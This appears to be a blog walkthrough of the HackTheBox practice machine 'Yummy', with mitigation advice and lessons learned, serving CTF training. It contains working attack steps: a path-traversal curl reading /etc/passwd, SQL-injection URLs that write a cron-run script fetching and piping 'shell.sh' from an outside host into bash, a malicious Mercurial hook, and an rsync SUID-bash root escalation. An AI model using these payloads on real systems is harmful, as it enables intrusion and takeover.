Beginner’s Guide to Conquering Yummy on HackTheBox

Key Highlights

• Learn about the significance of Yummy in cybersecurity practice and Capture The Flag (CTF) challenges.
• Explore the beginner-friendly challenges in Yummy, focusing on login vulnerabilities and SSH.
• Discover essential tools like GitHub, databases, and applications for hacking Yummy.
• Set up your hacking environment effectively, including virtual hosting and Remote Code Execution (RCE).
• Follow a step-by-step guide to conquering Yummy, from initial enumeration to exploiting vulnerabilities for access.

Introduction

Start your journey in cybersecurity as we explore Yummy on HackTheBox. Discover vulnerabilities, exploits, and challenges that are ready for your skills. Get ready to work through the complexities of Yummy, using smart tactics to unlock its secrets. Prepare yourself to dive into the world of cybersecurity by conquering Yummy and improving your hacking skills. Let’s get the tools and knowledge we need to succeed on this fun yet difficult platform.

Understanding Yummy on HackTheBox

Yummy on HackTheBox is a practice machine that helps improve cybersecurity skills. It shows real-life situations and tests your hacking knowledge. Knowing how to handle Yummy is important for developing skills in three main areas: finding information, exploiting weaknesses, and what to do afterward. This challenge includes different types of vulnerabilities like RCE and SSH. You will need a wide range of skills to manage it well.

What is Yummy and its significance in cybersecurity practice?

Yummy on HackTheBox is a machine that has weaknesses and is created for cybersecurity training. Learning about Yummy’s challenges helps you improve your hands-on skills. It is important because it helps sharpen your hacking skills, boosts your ability to solve problems, and gives a taste of real-life situations for those who want to work in cybersecurity.

Overview of challenges in Yummy for beginners

For those new to Yummy on HackTheBox, there are many challenges. You will face tricky vhost setups and chances to find vulnerabilities. It’s important to have good skills in SSH and PHP. You may need to navigate through password-protected directories and Github repositories. This can be tough! Knowing how application logic works and doing remote code execution (RCE) is very important. To get past these challenges, you need patience, creativity, and smart problem-solving. Learning to master Yummy is a rewarding journey in cybersecurity practice.

ALSO READ: Mastering Cicada: Beginner’s Guide from HackTheBox

Getting Started with Yummy

To explore Yummy on HackTheBox, you need tools like SSH, PHP, and GitHub to analyze code. Make sure your workspace is ready for success by concentrating on checking for vulnerabilities and exploiting them. It’s important to set up a strong list of login credentials to move forward.

Essential tools and resources for hacking Yummy

To effectively get into Yummy on HackTheBox, use tools like ssh for safe access. Check the app’s code with php to find any weaknesses. Use Github to look for possible issues. Access databases with passwords you get along the way. Use RCE to run commands on the server from afar. These tools are important for successful testing. Enjoy hacking!

Setting up your environment for success

It is important to create the right environment for success when learning Yummy. Start by using tools like SSH for safe connections. You can use PHP for your scripting tasks. Check out GitHub repositories for useful information. A good database setup is important for storing and accessing data quickly. Don’t forget to customize your virtual hosts and secure your passwords. With these steps done, you can confidently tackle hacking challenges.

Step-by-step Guide to Conquering Yummy

• To conquer Yummy, start with gathering information and examining the system carefully.
• Next, look for weaknesses to gain access successfully.
• Use tools like SSH, PHP for RCE, and GitHub to find passwords or details about apps.
• It is important to understand Yummy’s vhost setup and how the database is arranged.
• Stay organized and follow your plan throughout the hacking process to work through Yummy effectively.
• Remember, being careful and patient will help you succeed in your mission to conquer Yummy.
• Good luck on your hacking journey!

Step 1: Initial Enumeration and Reconnaissance

• Before hacking Yummy, it is important to get details about the target system.
• Start by using tools like Nmap. This helps find open ports and services.
• Look for weaknesses that can be used later.
• Use tools like Dirb to discover hidden folders and files.
• Knowing the target’s web technologies with tools like WhatWeb can give useful information.
• This first step is very important for a successful hack.
• Keep in mind that a careful search increases the chances of success.
• Always stay clear and focused during this time.

Rustscan

Let’s scan the ports on the machine using rustscan

The scan reveals two open ports:

• Port 22: OpenSSH 9.6p1 Ubuntu
• Port 80: Caddy httpd

The HTTP server redirects to http://yummy.htb/, so we add this to our /etc/hosts file:

echo '10.129.124.118 yummy.htb' | sudo tee -a /etc/hosts

Web Application Exploration

Happy Path Testing

Visiting http://yummy.htb, we encounter a restaurant website. Key features include:

1. Table booking functionality
2. User registration and login
3. Dashboard for viewing reservations
4. Calendar download for reservations
5. Reservation cancellation option

After registering an account and logging in, we gain access to additional features like viewing and managing reservations.

Unhappy Path Testing

During our exploration, we identify several potential vulnerabilities:

1. Book a Table form: Possible XSS or injection vulnerabilities
2. Account Registration: Weak password policy and username enumeration
3. /delete and /reminder endpoints: Use of incremental IDs, potential IDOR vulnerability
4. /export endpoint: Possible path traversal vulnerability
5. PRODID:ics.py reference: Potential Jinja2 SSTI vulnerability

Deeper Enumeration

Directory and Virtual Host Scanning

We use Gobuster to search for hidden directories and virtual hosts:

gobuster dir -u http://yummy.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 100 -o yummy_80.txt
gobuster vhost --domain yummy.htb --append-domain -u http://10.129.124.118 -w /usr/share/seclists/Discovery/DNS/namelist.txt -t 100

These scans don’t reveal any additional attack surfaces.

Step 2: Exploiting Found Vulnerabilities to Gain Access

To take the next step with the problems found in Yummy, you need to exploit them to get access. You can use tools like SSH and RCE to take advantage of these weaknesses. Check for PHP backdoors or any settings that are set up incorrectly to go further in. Look at GitHub repositories or databases to find ways to raise your privileges. It’s very important to have a good plan for cracking passwords. By knowing how the app is built, you can focus on the vhost for possible entry points. Use the vulnerabilities you found to speed up your penetration effectively.

Path Traversal in Export Function

We discover a path traversal vulnerability in the /export function. By intercepting the .ics file download request and modifying the path, we can read arbitrary files from the server:

curl -si -H "Cookie: X-AUTH-Token=<JWT_TOKEN>; <SESSION_COOKIE>" 'http://yummy.htb/export/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'

This allows us to read sensitive files like /etc/passwd and /etc/crontab.

Cron Job Analysis

Examining /etc/crontab reveals several interesting scheduled tasks:

1. app_backup.sh: Runs as www-data, creates a backup of the web application
2. table_cleanup.sh: Runs as mysql, performs database maintenance
3. dbmonitor.sh: Runs as mysql, monitors database status and executes a “fixer” script if issues are detected

Source Code Leak

Using the path traversal vulnerability, we download the web application source code (backupapp.zip) from /var/www/. This provides valuable insights into the application’s inner workings.

JWT Token Vulnerability

Analyzing the source code, particularly /opt/app/config/signature.py, reveals a vulnerability in the JWT token generation process. The RSA public key (n value) is exposed in the token, allowing us to forge admin tokens.

We create a Python script to generate a forged admin token:

from Crypto.PublicKey import RSA
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import sympy
import jwt
import base64

# ... (script content)

print(new_jwt)

This forged token grants access to the /admindashboard.

SQL Injection

The admin dashboard’s search functionality is vulnerable to SQL injection. We confirm this using sqlmap:

sqlmap -r sql --batch

The injection point is in the ‘o’ GET parameter, allowing for various SQL injection techniques.

Exploiting SQL Injection for RCE

We leverage the SQL injection vulnerability to write files to the server, exploiting the dbmonitor.sh cron job:

1. Create dbstatus.json:

http://yummy.htb/admindashboard?s=aa&o=ASC%3b+select+"pwned"+INTO+OUTFILE++'/data/scripts/dbstatus.json'+%3b

2. Create a malicious fixer script:

http://yummy.htb/admindashboard?s=aa&o=ASC%3b+select+"curl+10.10.16.20:8000/shell.sh+|bash%3b"+INTO+OUTFILE++'/data/scripts/fixer-v___'+%3b

This grants us a reverse shell as the mysql user.

Step 3: Privilege Escalation & Root Access

www-data User

We modify the app_backup.sh script to obtain a shell as www-data:

mv app_backup.sh app_backup.old
mv shell.sh app_backup.sh

QA User

Enumerating the /var/www/app-qatesting directory, we find a hidden .hg (Mercurial) folder. Searching for credentials, we discover the QA user’s password in the app.py.i file.

Dev User

As the QA user, we can execute /usr/bin/hg pull as the dev user. We exploit this by creating a malicious .hgrc file with a post-pull hook:

[hooks]
post-pull = /tmp/shell.sh

This grants us a shell as the dev user.

Root Access

The dev user can run a specific rsync command as root:

sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* /opt/app/

We exploit this by creating a SUID bash binary and using rsync to copy it to /opt/app with root ownership:

cp /bin/bash app-production/exploit
chmod u+s app-production/exploit
sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/

Finally, we execute the SUID binary to gain a root shell:

/opt/app/exploit -p

Root Flag: c***************************************

User Flag: e***************************************

In-Depth Analysis of Vulnerabilities

Path Traversal Vulnerability

The path traversal vulnerability in the /export function is a critical security flaw. It allows an attacker to read arbitrary files on the server, potentially exposing sensitive information. This vulnerability arises from improper input validation and sanitization.

To mitigate this, the application should:

1. Implement strict input validation
2. Use a whitelist of allowed file paths
3. Employ proper file access controls

JWT Token Forgery

The JWT token vulnerability stems from the exposure of the RSA public key (n value) in the token itself. This allows an attacker to reconstruct the private key and forge valid admin tokens.

To address this issue:

1. Use a secure key management system
2. Implement token rotation
3. Add additional layers of authentication for sensitive operations

SQL Injection

The SQL injection vulnerability in the admin dashboard search function is a severe security risk. It allows an attacker to manipulate the database and potentially execute arbitrary commands on the server.

Mitigation strategies include:

1. Using parameterized queries
2. Implementing proper input validation and sanitization
3. Employing the principle of least privilege for database access

Advanced Exploitation Techniques

Chaining Vulnerabilities

The Yummy machine demonstrates the power of chaining multiple vulnerabilities to achieve full system compromise. By combining the path traversal, JWT forgery, and SQL injection vulnerabilities, an attacker can move from an unauthenticated user to root access.

Exploiting Cron Jobs

The machine makes extensive use of cron jobs, which can be a double-edged sword from a security perspective. While they automate important tasks, they also provide potential avenues for privilege escalation if not properly secured.

In this case, we exploited the dbmonitor.sh cron job to gain initial access as the mysql user. This highlights the importance of:

1. Regularly auditing cron jobs
2. Applying the principle of least privilege to cron job execution
3. Implementing proper input validation for any scripts executed by cron jobs

Abusing Mercurial (hg)

The use of Mercurial (hg) version control system in this machine adds an interesting layer of complexity. By exploiting the ability to run hg pull as the dev user, we were able to execute arbitrary commands through a malicious .hgrc file.

This emphasizes the need for:

1. Careful configuration of version control systems
2. Regular security audits of VCS configurations
3. Implementing proper access controls for VCS operations

Exploiting rsync for Privilege Escalation

The final privilege escalation to root leverages a misconfigured sudo permission for rsync. This allows us to copy a SUID binary with root ownership, effectively granting root access.

To prevent such vulnerabilities:

1. Regularly audit sudo permissions
2. Apply the principle of least privilege
3. Use more specific sudo rules to limit the potential for abuse

Lessons Learned

1. Input Validation: Many of the vulnerabilities in this machine could have been prevented with proper input validation and sanitization.
2. Principle of Least Privilege: Applying this principle to cron jobs, sudo permissions, and database access would have significantly reduced the attack surface.
3. Security in Depth: Relying on a single layer of security (like JWT tokens) is insufficient. Multiple layers of authentication and authorization should be implemented.
4. Regular Audits: Regularly auditing system configurations, cron jobs, and access permissions is crucial for maintaining a secure environment.
5. Secure Coding Practices: Following secure coding practices, especially in web applications, is essential to prevent vulnerabilities like SQL injection and path traversal.

ALSO READ: Mastering Trickster: Beginner’s Guide from HackTheBox

Conclusion

Yummy presents a complex series of vulnerabilities that require a methodical approach to exploit. It demonstrates the importance of a holistic approach to security, covering aspects such as:

1. Web application security
2. System configuration and hardening
3. Access control and privilege management
4. Secure coding practices
5. Regular security audits and updates

By chaining multiple vulnerabilities and leveraging misconfigurations, an attacker can move from an unauthenticated user to full root access. This machine serves as an excellent example of the potential consequences of seemingly minor security oversights and the importance of a defense-in-depth approach to cybersecurity.

Frequently Asked Questions

What basic skills do I need to start with Yummy?

To begin with Yummy on HackTheBox, you need some basic skills. It is important to know about networking, the Linux command line, web application security, and privilege escalation. Understanding popular hacking tools like Nmap, Burp Suite, and Metasploit is helpful too.

What are some tips for beginners to successfully conquer Yummy on HackTheBox?

• Beginners should focus on detailed enumeration.
• Use privilege escalation techniques to your advantage.
• Common tools like Nmap and Burp Suite are very helpful.
• Stay determined when working on challenges.
• Practicing and learning from mistakes are important to master this platform.

How long does it typically take to conquer a box like Yummy?

Conquering a box like Yummy on HackTheBox can take different amounts of time based on your skill level. If you are just starting, it might take you days or even weeks. However, if you are more experienced, you can complete it in just a few hours. The important thing is to practice and keep trying to get better at challenges like Yummy.